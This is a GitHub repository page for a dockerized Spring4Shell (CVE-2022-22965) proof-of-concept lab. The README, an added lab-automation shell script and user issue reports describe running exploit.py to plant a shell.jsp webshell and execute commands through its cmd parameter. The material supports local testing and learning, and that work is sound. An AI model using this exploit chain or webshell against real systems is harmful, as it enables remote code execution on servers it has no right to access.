Dockerized Spring4Shell (CVE-2022-22965) PoC application and exploit

Overview

Spring4Shell PoC Application

This is a dockerized application that is vulnerable to Spring4Shell (CVE-2022-22965). The full Java source for the WAR is provided and can be modified; the WAR is rebuilt every time the Docker image is built and is then deployed to Tomcat. There is nothing special about the application itself: it is a simple hello world based on the Spring tutorials.

Details: https://www.lunasec.io/docs/blog/spring-rce-vulnerabilities

Having issues with the PoC? Check out the LunaSec fork at https://github.com/lunasec-io/Spring4Shell-POC, which is more actively maintained.

Requirements

  1. Docker
  2. Python3 + requests library

Instructions

  1. Clone the repository
  2. Build and run the container: docker build . -t spring4shell && docker run -p 8080:8080 spring4shell
  3. The app should now be available at http://localhost:8080/helloworld/greeting


  1. Run the exploit.py script: python exploit.py --url "http://localhost:8080/helloworld/greeting"


  1. Visit the created webshell and pass your command in the cmd GET parameter (the shell is at http://localhost:8080/shell.jsp by default, e.g. http://localhost:8080/shell.jsp?cmd=id).

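The three steps above run end to end, as an added example that is not part of this repo: the script builds and starts the container, waits for Tomcat to answer, runs exploit.py, and judges success by probing the shell URL before and after. The reports further down show exploit.py printing 500s and still announcing "Exploit completed", so the status codes it prints do not by themselves tell you whether the shell landed; a 404 turning into a 200 on shell.jsp does. Assumed: docker, curl and python3 on PATH, exploit.py in the current directory (the repo root), and the README's default target URL and shell.jsp file name.

```shell
#!/bin/sh
# Added example, not part of reznok/Spring4Shell-POC: run the README's three steps end to
# end and verify the result by probing for the dropped JSP. Assumes docker, curl and
# python3 on PATH and exploit.py in the current directory (the repo root).
set -eu

IMAGE="${IMAGE:-spring4shell}"
TARGET="${TARGET:-http://localhost:8080/helloworld/greeting}"

# The shell is dropped at the Tomcat root context, not under /helloworld, so its URL is
# <scheme>://<host>[:port]/<name> whatever the target path is (README default: shell.jsp).
shell_url() {
  _target="$1"; _name="${2:-shell.jsp}"
  _origin=$(printf '%s' "$_target" | sed -E 's#^([a-z]+://[^/]+).*#\1#')
  printf '%s/%s' "$_origin" "$_name"
}

# Extract the "Shell should be at: <url>" line exploit.py prints (format as in the
# reports on this page); prints nothing if the line is missing.
parse_shell_location() {
  sed -nE 's/.*Shell should be at: (http[^ ]*).*/\1/p' | head -n 1
}

# HTTP status of a URL: expect 404 before the exploit and 200 once shell.jsp exists.
# curl prints 000 when the connection fails; "|| true" keeps set -e from aborting.
http_status() {
  curl -s -o /dev/null -w '%{http_code}' "$1" || true
}

# Poll until the app answers 2xx/3xx; Tomcat needs a few seconds after docker run.
wait_for_http() {
  _url="$1"; _tries="${2:-30}"
  while [ "$_tries" -gt 0 ]; do
    if curl -fsS -o /dev/null "$_url" 2>/dev/null; then return 0; fi
    _tries=$((_tries - 1)); sleep 1
  done
  echo "timed out waiting for $_url" >&2
  return 1
}

run_lab() {
  docker build . -t "$IMAGE"
  cid=$(docker run -d -p 8080:8080 "$IMAGE")
  trap 'docker rm -f "$cid" >/dev/null' EXIT      # always tear the lab down
  wait_for_http "$TARGET"

  shell=$(shell_url "$TARGET")
  echo "before exploit: $shell -> $(http_status "$shell")"

  out=$(python3 exploit.py --url "$TARGET")
  printf '%s\n' "$out"
  reported=$(printf '%s\n' "$out" | parse_shell_location)
  if [ -n "$reported" ]; then
    shell=$(printf '%s' "$reported" | cut -d'?' -f1)   # drop the ?cmd=id suffix
  fi

  echo "after exploit: $shell -> $(http_status "$shell")"
  curl -s "$shell?cmd=id"; echo
}

# Guarded so the helpers can be sourced or tested without touching Docker:
#   RUN_LAB=1 sh run_lab.sh
if [ "${RUN_LAB:-0}" = "1" ]; then run_lab; fi
```

Run it with `RUN_LAB=1 sh run_lab.sh` from the repo root; the EXIT trap removes the container whether or not the exploit succeeds, which matters because a stale container is easy to mistake for a fresh, unexploited target.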

Notes

Fixed! (Earlier versions of this PoC required the container, or possibly just Tomcat, to be restarted between exploitations.)

Re-running the exploit creates an extra artifact file named {old_filename}_.jsp.

PRs/DMs @Rezn0k are welcome for improvements!

Credits

Comments
  • the vulnerability can not be exploited locally when it's run from the IntelliJ without using Dockerfile

    When the war file is deployed in the Docker container, the vulnerability can be exploited after running:

    1. docker build . -t spring4shell && docker run -p 8080:8080 spring4shell
    2. python3 exploit.py --url "http://localhost:8080/helloworld/greeting"
    3. go to http://localhost:8080/shell.jsp?cmd=id

    However, if I run this Spring Boot web app locally from IntelliJ (BTW, I had to add server.servlet.context-path=/helloworld in application.properties file) and try these steps:

    1. python3 exploit.py --url "http://localhost:8080/helloworld/greeting"
    2. go to http://localhost:8080/shell.jsp?cmd=id I've just got "HTTP Status 404 – Not Found" with http://localhost:8080/shell.jsp?cmd=id

    Can someone shed the light on why the vulnerability can't be exploited when it's run locally from IntelliJ?

    opened by idavollen 2
  • Getting status code 500

    I'm getting a status error code for some reason:

    [*] Resetting Log Variables.
    [*] Response code: 500
    [*] Modifying Log Configurations
    [*] Response code: 500
    [*] Response Code: 200
    [*] Resetting Log Variables.
    [*] Response code: 500
    [+] Exploit completed
    [+] Check your target for a shell
    [+] File: shell.jsp
    [+] Shell should be at: http://localhost:8080/shell.jsp?cmd=id

    opened by mikiputermy 2
  • fix dockerfile to contain a vulnerable version of tomcat and pin it

    Pushes to the Tomcat docker images have made it so the exploit fails. I have changed the version to a recent, but still vulnerable base image. I have also mirrored the image so that this doesn't happen again.

    opened by breadchris 2
  • Question about reproduction

    Hey @reznok, awesome work!

    I was wondering if having the Model and @ModelAttribute is required to be susceptible to the exploit? Often, a Controller is annotated with @RestController and looks more like:

    import java.util.List;
    import java.util.Set;
    import java.util.UUID;
    import lombok.NonNull;
    import lombok.RequiredArgsConstructor;
    import org.springframework.web.bind.annotation.GetMapping;
    import org.springframework.web.bind.annotation.PathVariable;
    import org.springframework.web.bind.annotation.RequestParam;
    import org.springframework.web.bind.annotation.RestController;

    // Sketch from the issue: REQUEST_PREFIX, MyService and SomePojo are the poster's own types
    @RestController
    @RequiredArgsConstructor
    public class MyRestController {

        @NonNull private final MyService myService;

        @GetMapping(value = REQUEST_PREFIX + "/path/{somePathVariable}/items")
        public List<SomePojo> someGetRequest(@PathVariable Integer somePathVariable, @RequestParam(value = "itemIds") Set<UUID> itemIds) {
            return myService.getSomePojos(somePathVariable, itemIds);
        }
    }
    

    my question in short is:

    Is this exploitable @RestController with @PathVariable, @RequestParam? Or only for Model and @ModelAttribute as it's in your example repo?

    opened by lc-nyovchev 2
  • unable to post the exploit to server

    Facing this issue:

    python3 exploit.py --url "http://localhost:8080/helloworld/greeting"
    [*] Resetting Log Variables.
    [*] Response code: 500
    [*] Modifying Log Configurations
    [*] Response code: 500
    [*] Response Code: 200
    [*] Resetting Log Variables.
    [*] Response code: 500
    [+] Exploit completed
    [+] Check your target for a shell
    [+] File: shell.jsp
    [+] Shell should be at: http://localhost:8080/shell.jsp?cmd=id

    Please let me know if there is any solution for this. Thanks.

    opened by swarup14 1
  • Confirmed reproduction

    I just want to comment here I can reproduce it using the Docker image. ...which is kind of scary itself.

    I tried to reproduce it on some other system with another java/tomcat/webapp closer to a production app of mine and it didn't work there out of the box... still investigating.

    opened by dagnelies 1
  • Replace blog post + refactor CLI

    Some minor refactoring of the CLI to explain what the magical string is.

    Remove dependency on docker-compose.

    The referenced blog post from Cyber Kendra initially contained click-bait content to draw traffic to the site and now it contains copy and pasted, uncited content stitched together.

    https://twitter.com/wdormann/status/1509373584883523586

    Full disclosure: my team wrote the linked blog post, and keeping it updated with community information has been our full-time job for the past couple of days.

    opened by breadchris 1
  • Error when attempting exploit

    Love this project! Thank you.

    I am running into the following issue however when following your README:

    1. load per the instructions
    2. python3 exploit.py --url "http://localhost:8080/helloworld/greeting"
    3. curl http://localhost:8080/shell.jsp?cmd=id

    leads to the below stack trace in the shell where I started the project with sudo docker run -p 8080:8080 <image>

    Any guidance you have is appreciated.

    2022-04-03 03:19:30.775 ERROR 1 --- [nio-8080-exec-5] o.s.b.w.servlet.support.ErrorPageFilter  : Forwarding to error page from request [/greeting] due to exception [Invalid property 'class.module.classLoader.resources' of bean class [java.lang.Module]: Could not instantiate property type [org.apache.catalina.WebResourceRoot] to auto-grow nested property path; nested exception is java.lang.NoSuchMethodException: org.apache.catalina.WebResourceRoot.<init>()]
    
    org.springframework.beans.NullValueInNestedPathException: Invalid property 'class.module.classLoader.resources' of bean class [java.lang.Module]: Could not instantiate property type [org.apache.catalina.WebResourceRoot] to auto-grow nested property path; nested exception is java.lang.NoSuchMethodException: org.apache.catalina.WebResourceRoot.<init>()
    	at org.springframework.beans.AbstractNestablePropertyAccessor.newValue(AbstractNestablePropertyAccessor.java:923) ~[spring-beans-5.3.15.jar:5.3.15]
    	at org.springframework.beans.AbstractNestablePropertyAccessor.createDefaultPropertyValue(AbstractNestablePropertyAccessor.java:887) ~[spring-beans-5.3.15.jar:5.3.15]
    	at org.springframework.beans.AbstractNestablePropertyAccessor.setDefaultValue(AbstractNestablePropertyAccessor.java:874) ~[spring-beans-5.3.15.jar:5.3.15]
    	at org.springframework.beans.AbstractNestablePropertyAccessor.getNestedPropertyAccessor(AbstractNestablePropertyAccessor.java:846) ~[spring-beans-5.3.15.jar:5.3.15]
    	at org.springframework.beans.AbstractNestablePropertyAccessor.getPropertyAccessorForPropertyPath(AbstractNestablePropertyAccessor.java:820) ~[spring-beans-5.3.15.jar:5.3.15]
    <snip>
    
    opened by aaronhmiller 0
Owner: Brandon Forbes (Offensive Security Professional)